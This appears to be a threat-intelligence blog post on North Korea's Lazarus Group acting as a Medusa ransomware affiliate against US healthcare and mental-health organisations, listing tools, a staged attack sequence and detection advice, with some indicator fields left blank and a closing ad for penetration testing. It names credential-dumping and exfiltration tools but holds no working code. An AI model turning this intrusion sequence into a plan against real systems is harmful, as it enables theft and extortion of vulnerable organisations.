North Korea's most notorious hacking group just made a career move. According to reports from Symantec, Carbon Black, and Broadcom's threat intelligence division, the Lazarus Group (aka Diamond Sleet, Pompilus) is now operating as an affiliate of the Medusa ransomware-as-a-service (RaaS) operation.
This is not Lazarus building their own ransomware. This is a nation-state APT group joining a commercial cybercrime franchise.
Why This Matters
Lazarus Group has historically developed custom malware — SHATTEREDGLASS, Maui, H0lyGh0st. These were bespoke tools for targeted operations. But starting in October 2024 with Andariel's partnership with Play ransomware, North Korean groups began adopting a new strategy:
Why build your own ransomware when you can use someone else's?
Medusa RaaS, operated by the Spearwing group since 2023, provides the ransomware payload, leak site, and negotiation infrastructure. Lazarus brings the access, the persistence, and the operational security of a state-backed threat actor.
The result: nation-state capabilities with commercial ransomware efficiency.
Who They Are Targeting
The victims tell a disturbing story:
- U.S. healthcare organizations — at least 4 targets since November 2025
- Mental health facilities
- Autism education nonprofits
- Social services organizations
- One confirmed breach of an unnamed entity in the Middle East
Average ransom demand: 60,000 — deliberately calibrated as high enough for significant payoff, yet potentially affordable for organizations that cannot survive extended downtime.
As one security researcher noted: "Targeting facilities dedicated to mental health and autistic children demonstrates maximum emotional leverage with volume-based approaches targeting chronically underfunded sectors."
The Kill Chain
Lazarus does not just drop Medusa and walk away. They deploy a full arsenal:
Tools Used
| Tool | Purpose |
|---|---|
| Comebacker | Custom backdoor (Lazarus-exclusive) |
| BLINDINGCAN (AIRDRY/ZetaNile) | Remote access trojan |
| InfoHook | Information stealer and data staging |
| RP_Proxy | Custom proxy for internal traffic routing |
| Mimikatz | Credential dumping |
| ChromeStealer | Chrome password extraction |
| curl | Data exfiltration |
| Medusa | Ransomware payload (final stage) |
Attack Sequence
- Initial access — method varies per target
- Disable security — local AV and EDR protections dismantled
- Deploy backdoors — Comebacker and BLINDINGCAN for persistent access
- Harvest credentials — Mimikatz for Windows creds, ChromeStealer for browser passwords
- Stage data — InfoHook scans and stages sensitive files
- Route traffic — RP_Proxy handles internal data movement
- Exfiltrate — data stolen before encryption
- Deploy Medusa — ransomware as the final payload
This is not a smash-and-grab. It is a methodical, multi-stage operation that ensures Lazarus maintains access even if the ransomware is detected and blocked.
What Defenders Should Watch For
Medusa Indicators
- Mass file rename with extension
- Ransom note:
- Volume Shadow Copy deletion:
- Recovery disabled:
Lazarus-Specific Indicators
- DLL sideloading in legitimate application directories
- Comebacker C2 callbacks — check CISA advisories for known infrastructure
- BLINDINGCAN network signatures — documented in CISA MAR reports
- ChromeStealer accessing SQLite database
Detection Events
- LSASS access: Sysmon Event ID 10 targeting lsass.exe
- Credential dumping: patterns
- Lateral movement: Unusual SMB/RPC from non-admin workstations
- Proxy activity: Internal port forwarding or SOCKS indicators
The Bigger Picture
This represents a fundamental shift in the threat landscape:
1. Attribution becomes harder. When North Korea uses Medusa, it looks like any other Medusa affiliate. Defenders cannot easily distinguish state-sponsored attacks from criminal ones.
2. Healthcare is increasingly targeted. Underfunded organizations with critical operations and sensitive data are ideal ransomware targets. The emotional leverage of targeting mental health and disability services creates additional pressure to pay.
3. The RaaS model is attracting nation-states. If Lazarus and Andariel are joining commercial RaaS programs, other state-backed groups will follow. Expect more convergence between state-sponsored and criminal operations.
4. Defense must focus on pre-ransomware activity. By the time Medusa deploys, the attacker has already been inside for days or weeks. Detecting the backdoors, credential theft, and data staging is far more effective than trying to stop the ransomware itself.
Practical Defense Steps
- Monitor for LSASS access — this catches both Mimikatz and similar tools
- Watch for VSS deletion — the clearest pre-encryption indicator
- Segment backup infrastructure — Lazarus targets backup systems to prevent recovery
- Implement canary files — detect mass file operations before encryption completes
- Review Chrome credential storage — enterprise credential managers reduce ChromeStealer impact
- Check CISA advisories — regularly updated IOCs for Lazarus tools
Test Your Ransomware Readiness
Could your organization detect a Lazarus-style attack before ransomware deployment? TheInsider-x.com offers free AI-powered penetration testing during our beta — including ransomware readiness assessment.
Sources: Symantec/Broadcom Threat Intelligence, Carbon Black Threat Hunter Team, TheHackerNews, BleepingComputer, HackRead
Part of our Threat Intelligence Briefing series.
Top comments (0)